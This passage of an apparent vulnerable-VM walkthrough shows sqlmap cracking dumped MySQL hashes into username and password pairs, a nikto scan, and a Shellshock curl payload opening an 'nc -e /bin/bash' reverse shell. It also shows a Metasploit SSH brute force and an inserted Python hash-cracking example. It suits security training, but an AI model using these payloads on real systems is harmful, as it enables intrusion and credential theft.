[*] 'tdeleon'@'localhost'
[*] 'tgoodchap'@'localhost'
[*] 'webapp'@'localhost'

When it retrieves the password hashes you will be prompted to let sqlmap crack them automatically.
Just note that there are so many user names and passwords that the next couple of pages are a mass spoiler.

do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[09:47:24] [INFO] writing hashes to a temporary file '/tmp/sqlmaphashes-XtKh9b.txt' 
do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] Y
[09:47:39] [INFO] using hash method 'mysql_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/txt/wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 2
what's the custom dictionary's location?
> /usr/share/wordlists/rockyou.txt
[09:48:22] [INFO] using custom dictionary
do you want to use common password suffixes? (slow!) [y/N] N
[*] aadams [1]:
    password hash: *F491287896471CB21030790BF46865C4A39DE651
    clear-text password: batman
[*] aallen [1]:
    password hash: *AE9F960F8FA0994C9878D2245DA640EAFF09BA0E
    clear-text password: superman
[*] aard [1]:
    password hash: *7FD9F123C9FC025372A5AAD19D107783CD19CCF7
    clear-text password: cheese
[*] aharp [1]:
    password hash: *44FFB04331ADAECB1FAB104F634E9B066BF8C6DC
    clear-text password: pokemon
[*] aheflin [1]:
    password hash: *90837F291B744BBE86DF95A37D2B2524185DBBF5
    clear-text password: whatever
[*] amaynard [1]:
    password hash: *4DC6D98E4CF6200B9F5529AFDE2E3B909F41E4D0
    clear-text password: kotaku
[*] aspears [1]:
    password hash: *CFBF459D9D6057BC2A85477A38327B96F06B1597
    clear-text password: iloveyou
[*] aweiland [1]:
    password hash: *B2B366CA5C4697F31D4C55D61F0B17E70E5664EC
    clear-text password: 666666
[*] bbanter [1]:
    password hash: *ED043A01F4583450BC8EB1E83C00C372CA49C4E4
    clear-text password: michelle
[*] bphillips [1]:
    password hash: *E56A114692FE0DE073F9A1DD68A00EEB9703F3F1
    clear-text password: 123123
[*] bwatkins [1]:
    password hash: *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
    clear-text password: 123456
[*] cchisholm [1]:
    password hash: *51AA306E66303073DBA15D2750E23C90C7A7F947
    clear-text password: baseball
[*] ccoffee [1]:
    password hash: *B12289EEF8752AD620294A64A37CD586223AB454
    clear-text password: 0
[*] dcooper [1]:
    password hash: *D6B63C1953E7F096DB307F8AC48C4AD703E57001
    clear-text password: sunshine
[*] dgilfillan [1]:
    password hash: *24B8599BAF46DD4B4D8DB50A3B10136457492622
    clear-text password: starwars
[*] dgrant [1]:
    password hash: *D37C49F9CBEFBF8B6F4B165AC703AA271E079004
    clear-text password: letmein
[*] djohnson [1]:
    password hash: *C5FEAC8A32D4FAFF1EF681447DA706634352AFF8
    clear-text password: killer
[*] dstevens [1]:
    password hash: *797420C584EBF42750EB523104268BA0FD87FBC8
    clear-text password: internet
[*] dtraylor [1]:
    password hash: *79BF466BCC601BD91A0897BB162421F9BA8C29CA
[*] dwestling [1]:
    password hash: *7B2F14D9BB629E334CD49A1028BD85750F7D3530
    clear-text password: shadow
[*] hlovell [1]:
    password hash: *3B477BC23EA39BFF66D64BFB68DB5EC5F5E31C91
    clear-text password: consumer
[*] jalcantar [1]:
    password hash: *46CFC7938B60837F46B610A2D10C248874555C14
    clear-text password: trustno1
[*] jalvarez [1]:
    password hash: *2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19
    clear-text password: password
[*] jayala [1]:
    password hash: *6691484EA6B50DDDE1926A220DA01FA9E575C18A
    clear-text password: abc123
[*] jbresnahan [1]:
    password hash: *446525BB82B5E22BD9E525261D37C494F623C52B
    clear-text password: blahblah
[*] jdavenport [1]:
    password hash: *61305383748FBEAB119F9A8BC35EBBADB4889A9D
[*] jduff [1]:
    password hash: *2CE4701D02A76C12CD513109CA16967A68B4C23A
    clear-text password: princess
[*] jfranklin [1]:
    password hash: *2A032F7C5BA932872F0F045E0CF6B53CF702F2C5
    clear-text password: 654321
[*] kclemons [1]:
    password hash: *74B1C21ACE0C2D6B0678A5E503D2A60E8F9651A3
    clear-text password: passw0rd
[*] krenfro [1]:
    password hash: *8D6A637F37955DBFCE1229204DDBED1CE11E6F41
    clear-text password: master
[*] ktso [1]:
    password hash: *A4B6157319038724E3560894F7F932C8886EBFCF
    clear-text password: 1234
[*] kwebber [1]:
    password hash: *F8E113FD51D520075836A4B815568BA2B96F7C30
    clear-text password: dragon
[*] lmartinez [1]:
    password hash: *626AC8265C7D53693CB7478376CE1B4825DFF286
    clear-text password: pepper
[*] lmorales [1]:
    password hash: *FCAAF3F0BD94C027B2769A95903C355CE6294660
    clear-text password: football
[*] mbryan [1]:
    password hash: *B021918A5DCA54916CF724573179571DFC37AC88
    clear-text password: jennifer
[*] mholland [1]:
    password hash: *A7D31514D37A55CE91C6C5DF97299CBC1B1937EC
    clear-text password: jordan
[*] mnader [1]:
    password hash: *DF216F57F1F2066124E1AA5491D995C3CB57E4C2
    clear-text password: welcome
[*] mrodriguez [1]:
    password hash: *AA1420F182E88B9E5F874F6FBE7459291E8F4601
    clear-text password: qwerty
[*] myajima [1]:
    password hash: *3EEB06BE54EABF909DC8F6107110777F1DE43186
[*] qpowers [1]:
    password hash: *DB1B792EC6DAE393BAE7AD832D3AF207C12E9A00
    clear-text password: michael
[*] rdominguez [1]:
    password hash: *00A51F3F48415C7D4E8908980D443C29C69B60C9
    clear-text password: 12345
[*] rjacobson [1]:
    password hash: *FD571203974BA9AFE270FE62151AE967ECA5E0AA
    clear-text password: 111111
[*] rpatel [1]:
    password hash: *6A7A490FB9DC8C33C2B025A91737077A7E9CC5E5
    clear-text password: 1234567
[*] sgains [1]:
    password hash: *81101DED975D54BD76A3C8EAD293597AE9BB143F
    clear-text password: computer
[*] sjohnson [1]:
    password hash: *84AAC12F54AB666ECFC2A83C676908C8BBC381B1
    clear-text password: 12345678
[*] strammel [1]:
    password hash: *A5892368AE83685440A1E27D012306B073BDF5B7
    clear-text password: monkey
[*] swarren [1]:
    password hash: *FBA7C2D27C9D05F3FD4C469A1BBAF557114E5594
    clear-text password: Password
[*] tdeleon [1]:
    password hash: *94F3DC3F398B76269CAAD51627279D4233A6C89A
    clear-text password: soccer
[*] tgoodchap [1]:
    password hash: *22AC3D548EB2C2A2F4E609ADA63251D0AF795AD9
    clear-text password: nintendo
[*] webapp [1]:
    password hash: *0DCC22A95EEBFF4984DF6A7B7F2D7D28DBB5F36F
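The 'mysql_passwd' hash method sqlmap used above, as an added Python example that is not part of the original walkthrough: the MySQL 4.1+ PASSWORD() scheme reimplemented and checked against two hash/clear-text pairs from the output above, then run over a constructed four-word stand-in for rockyou.txt to show why an unsalted, single-pass hash falls to a wordlist. The same lookup works as an audit of mysql.user against a banned-password list, and the grouping helper shows the other cost of no salt: identical passwords are visible as identical hashes.

```python
import hashlib

# Two hash / clear-text pairs taken from the sqlmap output above.
KNOWN_HASHES = {
    "jalvarez": "*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19",
    "bwatkins": "*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9",
}

# Constructed four-word stand-in for /usr/share/wordlists/rockyou.txt.
WORDLIST = ["letmein", "password", "123456", "qwerty"]


def mysql_passwd(password):
    """MySQL 4.1+ PASSWORD(): '*' followed by the uppercase hex of
    SHA1(SHA1(password)). No salt and no work factor, so one precomputed
    table covers every user and each guess costs two SHA1 calls."""
    inner = hashlib.sha1(password.encode("utf-8")).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()


def check_wordlist(user_hashes, wordlist):
    """Hash each candidate once, then look every user's hash up in the table.
    Returns {user: clear-text} for the hashes a wordlist entry reproduces;
    the same routine audits mysql.user against a banned-password list."""
    table = {mysql_passwd(word): word for word in wordlist}
    return {user: table[h] for user, h in user_hashes.items() if h in table}


def shared_password_groups(user_hashes):
    """Users grouped by identical hash, which with this scheme means identical
    password. Singletons are dropped; only reused passwords are reported."""
    groups = {}
    for user, h in user_hashes.items():
        groups.setdefault(h, []).append(user)
    return {h: sorted(users) for h, users in groups.items() if len(users) > 1}


if __name__ == "__main__":
    for user, clear in check_wordlist(KNOWN_HASHES, WORDLIST).items():
        print(f"[*] {user}: clear-text password: {clear}")
```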

We know that we have SQL injection, but let's hit it with nikto also. This thing is a wreck.

root@SNM-KScan-2:~# nikto -h 192.168.1.120
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.120
+ Target Hostname:    192.168.1.120
+ Target Port:        80
+ Start Time:         2015-01-08 09:21:21 (GMT-7)
---------------------------------------------------------------------------
+ Server: Apache/2.2.11 (Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0
+ Retrieved x-powered-by header: PHP/5.2.9
+ The anti-clickjacking X-Frame-Options header is not present.
+ mod_apreq2-20051231/2.6.0 appears to be outdated (current is at least 2.6.1)
+ mod_perl/2.0.4 appears to be outdated (current is at least 2.0.7)
+ Apache/2.2.11 appears to be outdated (current is at least Apache/2.4.7). Apache 2.0.65 (final release) and 2.2.26 are also current.
+ mod_ssl/2.2.11 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ PHP/5.2.9 appears to be outdated (current is at least 5.4.26)
+ Perl/v5.10.0 appears to be outdated (current is at least v5.14.2)
+ OpenSSL/0.9.8k appears to be outdated (current is at least 1.0.1e). OpenSSL 0.9.8r is also current.
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var
+ Server leaks inodes via ETags, header found with file /favicon.ico, inode: 8429, size: 30894, mtime: Fri May 11 06:40:36 2007
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. CVE-2002-0082, OSVDB-756.
+ OSVDB-3268: /webalizer/: Directory indexing found.
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3233: /cgi-bin/printenv: Apache 2.0 default script is executable and gives server environment variables. All default scripts should be removed. It may also allow XSS types of attacks. http://www.securityfocus.com/bid/4431.
+ OSVDB-3233: /cgi-bin/test-cgi: Apache 2.0 default script is executable and reveals system information. All default scripts should be removed.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 7354 requests: 0 error(s) and 25 item(s) reported on remote host
+ End Time:           2015-01-08 09:22:12 (GMT-7) (51 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

So I’m not giving up on Shellshock.

curl -k -H 'User-Agent: () { :;}; /bin/bash -c "nc -e /bin/bash 192.168.1.130 5005"'  http://192.168.1.120/cgi-bin/printenv.cgi

Nope, no joy. Let's try some Metasploit attacks. Port 631 was listening and we have usernames and passwords.

use exploit/multi/http/cups_bash_env_exec

Even less joy. Sigh… let's just try the reversed passwords for the accounts. Our old friends ccoffee, bbanter and aadams are all there.

Module options (auxiliary/scanner/ssh/ssh_login):

   Name              Current Setting                Required  Description
   ----              ---------------                --------  -----------
   BLANK_PASSWORDS   false                          no        Try blank passwords for all users
   BRUTEFORCE_SPEED  3                              yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false                          no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false                          no        Add all passwords in the current database to the list
   DB_ALL_USERS      false                          no        Add all users in the current database to the list
   PASSWORD                                         no        A specific password to authenticate with
   PASS_FILE                                        no        File containing passwords, one per line
   RHOSTS            192.168.1.120                  yes       The target address range or CIDR identifier
   RPORT             22                             yes       The target port
   STOP_ON_SUCCESS   false                          yes       Stop guessing when a credential works for a host
   THREADS           1                              yes       The number of concurrent threads
   USERNAME                                         no        A specific username to authenticate as
   USERPASS_FILE     /root/Desktop/deice/users.txt  no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false                          no        Try the username as the password for all users
   USER_FILE                                        no        File containing usernames, one per line
   VERBOSE           true                           yes       Whether to print output for all attempts


msf auxiliary(ssh_login) > run

[*] 192.168.1.120:22 SSH - Starting bruteforce
[+] 192.168.1.120:22 SSH - Success: 'aadams:batman' 'uid=1003(aadams) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 1 opened (192.168.1.130:60840 -> 192.168.1.120:22) at 2015-01-08 12:28:52 -0700
[+] 192.168.1.120:22 SSH - Success: 'aallen:superman' 'uid=1031(aallen) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 2 opened (192.168.1.130:33943 -> 192.168.1.120:22) at 2015-01-08 12:28:55 -0700
[+] 192.168.1.120:22 SSH - Success: 'aard:cheese' 'uid=1000(aard) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 3 opened (192.168.1.130:49918 -> 192.168.1.120:22) at 2015-01-08 12:28:59 -0700
[+] 192.168.1.120:22 SSH - Success: 'aharp:pokemon' 'uid=1039(aharp) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 4 opened (192.168.1.130:38831 -> 192.168.1.120:22) at 2015-01-08 12:29:02 -0700
[+] 192.168.1.120:22 SSH - Success: 'aheflin:whatever' 'uid=1017(aheflin) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 5 opened (192.168.1.130:43816 -> 192.168.1.120:22) at 2015-01-08 12:29:05 -0700
[+] 192.168.1.120:22 SSH - Success: 'amaynard:kotaku' 'uid=1018(amaynard) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 6 opened (192.168.1.130:52789 -> 192.168.1.120:22) at 2015-01-08 12:29:08 -0700
[+] 192.168.1.120:22 SSH - Success: 'aspears:iloveyou' 'uid=1035(aspears) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 7 opened (192.168.1.130:47274 -> 192.168.1.120:22) at 2015-01-08 12:29:11 -0700
[+] 192.168.1.120:22 SSH - Success: 'aweiland:666666' 'uid=1032(aweiland) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 8 opened (192.168.1.130:55692 -> 192.168.1.120:22) at 2015-01-08 12:29:15 -0700
[+] 192.168.1.120:22 SSH - Success: 'bbanter:michelle' 'uid=1012(bbanter) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 9 opened (192.168.1.130:47768 -> 192.168.1.120:22) at 2015-01-08 12:29:19 -0700
[+] 192.168.1.120:22 SSH - Success: 'bphillips:123123' 'uid=1024(bphillips) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 10 opened (192.168.1.130:53612 -> 192.168.1.120:22) at 2015-01-08 12:29:22 -0700
[+] 192.168.1.120:22 SSH - Success: 'bwatkins:123456' 'uid=1037(bwatkins) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 11 opened (192.168.1.130:47820 -> 192.168.1.120:22) at 2015-01-08 12:29:26 -0700
[+] 192.168.1.120:22 SSH - Success: 'cchisholm:baseball' 'uid=1022(cchisholm) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 12 opened (192.168.1.130:54756 -> 192.168.1.120:22) at 2015-01-08 12:29:29 -0700
[+] 192.168.1.120:22 SSH - Success: 'ccoffee:0' 'uid=1044(ccoffee) gid=100(users) groups=100(users),102(admin) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 13 opened (192.168.1.130:55911 -> 192.168.1.120:22) at 2015-01-08 12:29:33 -0700
[+] 192.168.1.120:22 SSH - Success: 'dcooper:sunshine' 'uid=1036(dcooper) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 14 opened (192.168.1.130:47440 -> 192.168.1.120:22) at 2015-01-08 12:29:37 -0700
[+] 192.168.1.120:22 SSH - Success: 'dgilfillan:starwars' 'uid=1014(dgilfillan) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 15 opened (192.168.1.130:51523 -> 192.168.1.120:22) at 2015-01-08 12:29:40 -0700
[+] 192.168.1.120:22 SSH - Success: 'dgrant:letmein' 'uid=1015(dgrant) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 16 opened (192.168.1.130:43905 -> 192.168.1.120:22) at 2015-01-08 12:29:43 -0700
[+] 192.168.1.120:22 SSH - Success: 'djohnson:killer' 'uid=1011(djohnson) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 17 opened (192.168.1.130:58887 -> 192.168.1.120:22) at 2015-01-08 12:29:47 -0700
[+] 192.168.1.120:22 SSH - Success: 'dstevens:internet' 'uid=1023(dstevens) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 18 opened (192.168.1.130:42132 -> 192.168.1.120:22) at 2015-01-08 12:29:51 -0700
[+] 192.168.1.120:22 SSH - Success: 'dwestling:shadow' 'uid=1025(dwestling) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 19 opened (192.168.1.130:37133 -> 192.168.1.120:22) at 2015-01-08 12:29:54 -0700
[+] 192.168.1.120:22 SSH - Success: 'hlovell:consumer' 'uid=1021(hlovell) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 20 opened (192.168.1.130:43957 -> 192.168.1.120:22) at 2015-01-08 12:29:57 -0700
[+] 192.168.1.120:22 SSH - Success: 'jalcantar:trustno1' 'uid=1040(jalcantar) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 21 opened (192.168.1.130:36937 -> 192.168.1.120:22) at 2015-01-08 12:30:00 -0700
[+] 192.168.1.120:22 SSH - Success: 'jalvarez:password' 'uid=1013(jalvarez) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 22 opened (192.168.1.130:42853 -> 192.168.1.120:22) at 2015-01-08 12:30:04 -0700
[+] 192.168.1.120:22 SSH - Success: 'jayala:abc123' 'uid=1029(jayala) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 23 opened (192.168.1.130:34358 -> 192.168.1.120:22) at 2015-01-08 12:30:07 -0700
[+] 192.168.1.120:22 SSH - Success: 'jbresnahan:blahblah' 'uid=1002(jbresnahan) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 24 opened (192.168.1.130:44168 -> 192.168.1.120:22) at 2015-01-08 12:30:10 -0700
[+] 192.168.1.120:22 SSH - Success: 'jduff:princess' 'uid=1020(jduff) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 25 opened (192.168.1.130:45406 -> 192.168.1.120:22) at 2015-01-08 12:30:14 -0700
[+] 192.168.1.120:22 SSH - Success: 'jfranklin:654321' 'uid=1027(jfranklin) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 26 opened (192.168.1.130:42125 -> 192.168.1.120:22) at 2015-01-08 12:30:17 -0700
[+] 192.168.1.120:22 SSH - Success: 'kclemons:passw0rd' 'uid=1009(kclemons) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 27 opened (192.168.1.130:50416 -> 192.168.1.120:22) at 2015-01-08 12:30:20 -0700
[+] 192.168.1.120:22 SSH - Success: 'krenfro:master' 'uid=1048(krenfro) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 28 opened (192.168.1.130:51770 -> 192.168.1.120:22) at 2015-01-08 12:30:24 -0700
[+] 192.168.1.120:22 SSH - Success: 'ktso:1234' 'uid=1005(ktso) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 29 opened (192.168.1.130:41473 -> 192.168.1.120:22) at 2015-01-08 12:30:27 -0700
[+] 192.168.1.120:22 SSH - Success: 'kwebber:dragon' 'uid=1016(kwebber) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 30 opened (192.168.1.130:38814 -> 192.168.1.120:22) at 2015-01-08 12:30:30 -0700
[+] 192.168.1.120:22 SSH - Success: 'lmartinez:pepper' 'uid=1034(lmartinez) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 31 opened (192.168.1.130:51877 -> 192.168.1.120:22) at 2015-01-08 12:30:34 -0700
[+] 192.168.1.120:22 SSH - Success: 'lmorales:football' 'uid=1028(lmorales) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 32 opened (192.168.1.130:54770 -> 192.168.1.120:22) at 2015-01-08 12:30:37 -0700
[+] 192.168.1.120:22 SSH - Success: 'mbryan:jennifer' 'uid=1042(mbryan) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 33 opened (192.168.1.130:45205 -> 192.168.1.120:22) at 2015-01-08 12:30:40 -0700
[+] 192.168.1.120:22 SSH - Success: 'mholland:jordan' 'uid=1041(mholland) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 34 opened (192.168.1.130:38046 -> 192.168.1.120:22) at 2015-01-08 12:30:43 -0700
[+] 192.168.1.120:22 SSH - Success: 'mnader:welcome' 'uid=1047(mnader) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 35 opened (192.168.1.130:60899 -> 192.168.1.120:22) at 2015-01-08 12:30:47 -0700
[+] 192.168.1.120:22 SSH - Success: 'mrodriguez:qwerty' 'uid=1026(mrodriguez) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 36 opened (192.168.1.130:51135 -> 192.168.1.120:22) at 2015-01-08 12:30:50 -0700
[+] 192.168.1.120:22 SSH - Success: 'qpowers:michael' 'uid=1001(qpowers) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 37 opened (192.168.1.130:35915 -> 192.168.1.120:22) at 2015-01-08 12:30:53 -0700
[+] 192.168.1.120:22 SSH - Success: 'rdominguez:12345' 'uid=1010(rdominguez) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 38 opened (192.168.1.130:53430 -> 192.168.1.120:22) at 2015-01-08 12:30:56 -0700
[+] 192.168.1.120:22 SSH - Success: 'rjacobson:111111' 'uid=1043(rjacobson) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 39 opened (192.168.1.130:34041 -> 192.168.1.120:22) at 2015-01-08 12:31:00 -0700
